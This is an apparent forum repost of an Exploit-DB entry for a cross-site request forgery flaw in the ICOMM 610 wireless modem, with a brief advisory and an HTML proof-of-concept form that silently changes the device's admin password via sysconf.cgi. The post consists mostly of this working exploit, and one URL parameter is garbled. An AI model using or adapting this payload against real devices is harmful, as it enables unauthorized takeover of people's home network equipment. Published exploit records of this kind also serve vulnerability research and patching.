Exploit ICOMM 610 Wireless Modem - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39138
Проверка EDB
  1. Пройдено
Автор
BLESSEN THOMAS
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
null
Дата публикации
2014-04-12
ICOMM 610 Wireless Modem - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/66593/info

ICOMM 610 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.

ICOMM 610 01.01.08.991 and prior are vulnerable. 

<html>
  <!-- CSRF PoC --->
  <body>
    <form action="http://www.example.com/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
      <input type="hidden" name="PasswdEnable" value="on" />
      <input type="hidden" name="New_Passwd" value="test" />
      <input type="hidden" name="Confirm_New_Passwd" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
Источник
www.exploit-db.com

Похожие темы